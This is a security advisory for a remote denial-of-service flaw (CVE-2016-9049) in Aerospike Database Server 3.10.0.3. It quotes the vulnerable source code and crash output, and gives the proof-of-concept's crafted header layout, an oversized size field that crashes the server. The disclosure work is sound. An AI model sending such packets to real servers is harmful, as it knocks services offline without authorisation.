Talos Vulnerability Report

TALOS-2016-0263

Aerospike Database Server Fabric-Worker Socket-Loop Denial-of-Service Vulnerability

February 21, 2017
CVE Number

CVE-2016-9049

Summary

An exploitable denial-of-service vulnerability exists in the fabric-worker component of Aerospike Database Server 3.10.0.3. A specially crafted packet can cause the server process to dereference a null pointer. An attacker can simply connect to a TCP port in order to trigger this vulnerability.

Tested Versions

Aerospike Database Server 3.10.0.3

Product URLs

https://github.com/aerospike/aerospike-server/tree/3.10.0.3

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Details

The Aerospike Database Server is both a distributed and scalable NoSQL database that is used as a back-end for scalable web applications that need a key-value store. With a focus on performance, it is multi-threaded and retains its indexes entirely in ram with the ability to persist data to a solid-state drive or traditional rotational media.

When receiving a packet on the fabric port (3001/TCP) the server will read data from a socket [1]. Upon receiving a packet, the data returned will be passed as an argument to the msg_get_initial function at [2]. Inside this function, the server will extract the size and type of the packet and write them to the variables fb->r_msg_size and fb->r_type.

as/src/fabric/fabric.c:1029
static bool
fabric_buffer_process_readable(fabric_buffer *fb)
{
...
    while (true) {
        size_t recv_full = fb->r_end - fb->r_append;
        int32_t	recv_sz = cf_socket_recv(&fb->sock, fb->r_append, recv_full, 0);            // [1]
...
        if (fb->r_msg_size == 0) {
            size_t hdr_sz = fb->r_append - fb->r_buf;
...
            if (msg_get_initial(&fb->r_msg_size, &fb->r_type, fb->r_buf, hdr_sz) != 0) {    // [2]
                cf_warning(AS_FABRIC, "fabric_buffer_process_readable() invalid msg_hdr");
                return false;
            }
...

Inside the msg_get_initial function, the server will ensure that the buffer is >= 6 bytes. Afterwards, the buffer will be casted to a msg_hdr structure which contains a size and a type [1]. After flipping the byte-order to the architecture’s native format [2], the size and type will be written to the pointers passed in the function’s arguments.

cf/src/msg.c:377
int
msg_get_initial(uint32_t *size_r, msg_type *type_r, const uint8_t *buf, uint32_t buflen)
{
    if (buflen < sizeof(msg_hdr)) {
        return -1;
    }

    const msg_hdr *hdr = (const msg_hdr *)buf;                  // [1]

    *size_r = cf_swap_from_be32(hdr->size) + sizeof(msg_hdr);   // [2]
    *type_r = (msg_type)cf_swap_from_be16(hdr->type);

    return 0;
}

Upon returning to the fabric_buffer_process_readable function, the server will check to see if the resulting size is larger than 0x100000 [1], and then use this size in a following allocation. Due to a missing check of on the result of the call to cf_malloc [2], an attacker can cause the allocation to fail which when encountering the memcpy that follows will result in a write to a NULL pointer before reading the rest of the packet [3].

as/src/fabric/fabric.c:243
#define FB_BUF_MEM_SZ		(1024 * 1024)

as/src/fabric/fabric.c:1029
static bool
fabric_buffer_process_readable(fabric_buffer *fb)
{
...
    while (true) {
        size_t recv_full = fb->r_end - fb->r_append;
        int32_t	recv_sz = cf_socket_recv(&fb->sock, fb->r_append, recv_full, 0);
...
        if (fb->r_msg_size == 0) {
            size_t hdr_sz = fb->r_append - fb->r_buf;
...
            if (msg_get_initial(&fb->r_msg_size, &fb->r_type, fb->r_buf, hdr_sz) != 0) {
                cf_warning(AS_FABRIC, "fabric_buffer_process_readable() invalid msg_hdr");
                return false;
            }

            if (fb->r_msg_size > FB_BUF_MEM_SZ) {           // [1] 1024*1024
                fb->r_buf = cf_malloc(fb->r_msg_size);      // [2]
                fb->r_append = fb->r_buf + hdr_sz;
                memcpy(fb->r_buf, fb->membuf, hdr_sz);      // [3]
            }

Crash Information

# gdb -q -p `systemctl status aerospike.service | grep 'Main PID' | cut -d: -f2- | cut -d' ' -f2`

...
(gdb) c
Continuing.

[Switching to Thread 0x7f681e79a700 (LWP 27061)]

Catchpoint 4 (signal SIGSEGV), 0x00007f68999578b6 in __memcpy_ssse3_back ()
   from /lib64/libc.so.6

(gdb) x/i $pc
=> 0x7f68999578b6 <__memcpy_ssse3_back+8518>:   mov    %edx,-0x6(%rdi)
(gdb) i r $rdi
rdi            0x6      0x6

Exploit Proof-of-Concept

To execute the proof-of-concept (note: this is only provided to the vendor), simply extract and run it as follows:

$ python poc hostname:3001
Trying to connect to hostname:3001
Sending 0x6 byte header... done.
Keeping connection open for just a couple seconds.....done.
Checking if host is dead... yes.

The proof-of-concept sends a packet encoded in big-endian form with the following structure. To trigger this vulnerability, an aggressor simply needs to specify a 32-bit size that is larger than 0x100000 and will cause the target server’s allocator to fail. The server will add the value of size with the size of a msg_hdr (6) and then used it in an allocation.

<class aspie.msg_hdr_s> 'header'
[0] <instance uint32_t 'size'> +0xfffffff9 (4294967289)
[4] <instance aspie.M_TYPE 'type'> FABRIC(0x0)

Mitigation

Is it recommended to use technology such as a firewall to deny illegitimate users access to the ports required by the server for clustering.

Timeline

2016-12-23 - Vendor Disclosure
2017-02-21 - Public Release

Credit

Discovered by the Cisco Talos Team.